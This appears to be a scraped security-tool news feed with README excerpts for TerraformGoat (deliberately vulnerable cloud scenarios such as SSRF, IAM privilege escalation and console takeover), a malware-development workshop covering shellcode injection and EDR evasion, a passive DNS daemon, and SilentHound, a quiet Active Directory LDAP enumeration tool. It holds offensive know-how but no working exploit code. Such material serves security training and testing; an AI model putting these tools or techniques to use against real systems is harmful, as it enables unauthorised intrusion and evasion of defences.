17Alibaba CloudElastic Computing ServiceECS Virtual Machine Disks Are Unencrypted
18Tencent CloudNetworkingVPC Security Group Open All Ports
19Tencent CloudNetworkingVPC Security Group Open Common Ports
20Tencent CloudObject StorageBucket ACL Writable
21Tencent CloudObject StorageBucket ACL Readable
22Tencent CloudObject StorageBucket Public Access
23Tencent CloudObject StorageObject Public Access
24Tencent CloudObject StorageUnrestricted File Upload
25Tencent CloudObject StorageBucket Object Traversal
26Tencent CloudObject StorageBucket Logging Disable
27Tencent CloudObject StorageServer Side Encryption Disable
28Tencent CloudElastic Computing ServiceCVM SSRF
29Tencent CloudElastic Computing ServiceCBS Storage Are Not Used
30Tencent CloudElastic Computing ServiceCVM Virtual Machine Disks Are Unencrypted
31Huawei CloudNetworkingECS Unsafe Security Group
32Huawei CloudObject StorageObject ACL Writable
33Huawei CloudObject StorageSpecial Bucket Policy
34Huawei CloudObject StorageUnrestricted File Upload
35Huawei CloudObject StorageBucket Object Traversal
36Huawei CloudObject StorageWrong Policy Causes Arbitrary File Uploads
37Huawei CloudElastic Computing ServiceECS SSRF
38Huawei CloudRelational Database ServiceRDS Mysql Baseline Checking Environment
39Amazon Web ServicesNetworkingVPC Security Group Open All Ports
40Amazon Web ServicesNetworkingVPC Security Group Open Common Ports
41Amazon Web ServicesObject StorageObject ACL Writable
42Amazon Web ServicesObject StorageBucket ACL Writable
43Amazon Web ServicesObject StorageBucket ACL Readable
44Amazon Web ServicesObject StorageMFA Delete Is Disable
45Amazon Web ServicesObject StorageSpecial Bucket Policy
46Amazon Web ServicesObject StorageBucket Object Traversal
47Amazon Web ServicesObject StorageUnrestricted File Upload
48Amazon Web ServicesObject StorageBucket Logging Disable
49Amazon Web ServicesObject StorageBucket Allow HTTP Access
50Amazon Web ServicesObject StorageBucket Default Encryption Disable
51Amazon Web ServicesElastic Computing ServiceEC2 SSRF
52Amazon Web ServicesElastic Computing ServiceConsole Takeover
53Amazon Web ServicesElastic Computing ServiceEBS Volumes Are Not Used
54Amazon Web ServicesElastic Computing ServiceEBS Volumes Encryption Is Disabled
55Amazon Web ServicesElastic Computing ServiceSnapshots Of EBS Volumes Are Unencrypted
56Amazon Web ServicesIdentity and Access ManagementIAM Privilege Escalation
57Google Cloud PlatformObject StorageObject ACL Writable
58Google Cloud PlatformObject StorageBucket ACL Writable
59Google Cloud PlatformObject StorageBucket Object Traversal
60Google Cloud PlatformObject StorageUnrestricted File Upload
61Google Cloud PlatformElastic Computing ServiceVM Command Execution
62Microsoft AzureObject StorageBlob Public Access
63Microsoft AzureObject StorageContainer Blob Traversal
64Microsoft AzureElastic Computing ServiceVM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine environment support, Docker Engine installation can be found in https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash


 

cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



The program prompts Enter a value:, type yes and enter, use curl to access the bucket, you can see the object traversed.



To avoid the cloud service from continuing to incur charges, remember to destroy the scenario in time after using it.

terraform destroy

Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following command under the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README of each vulnerable environment is executed within the TerraformGoat container environment, so the TerraformGoat container environment needs to be deployed first.
  2. Due to the horizontal risk of intranet horizontal on the cloud in some scenarios, it is strongly recommended that users use their own test accounts to configure the scenarios, avoid using the cloud account of the production environment, and install TerraformGoat using Dockerfile to isolate the user's local cloud vendor token and the test account token.
  3. TerraformGoat is used for educational purposes only, It is not allowed to use it for illegal and criminal purposes, any consequences arising from TerraformGoat are the responsibility of the person using it, and not the selefra organization.


Contributing

Contributions are welcomed and greatly appreciated. Further reading — CONTRIBUTING.md for details on contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Maldev-For-Dummies - A Workshop About Malware Development

$
0
0


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.

 

Workshop Description

With antivirus (AV) and Enterprise Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just as fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio, and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop):Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc filename.exe /unsafe

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



PR-DNSd - Passive-Recursive DNS Daemon

$
0
0


Passive-Recursive DNS daemon.


Quickstart

nameserver 127.0.0.1 | sudo tee /etc/resolv.conf dig google.com dig -x $(dig +short google.com)">
go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
-silent
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS serv er (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)


SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

$
0
0


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>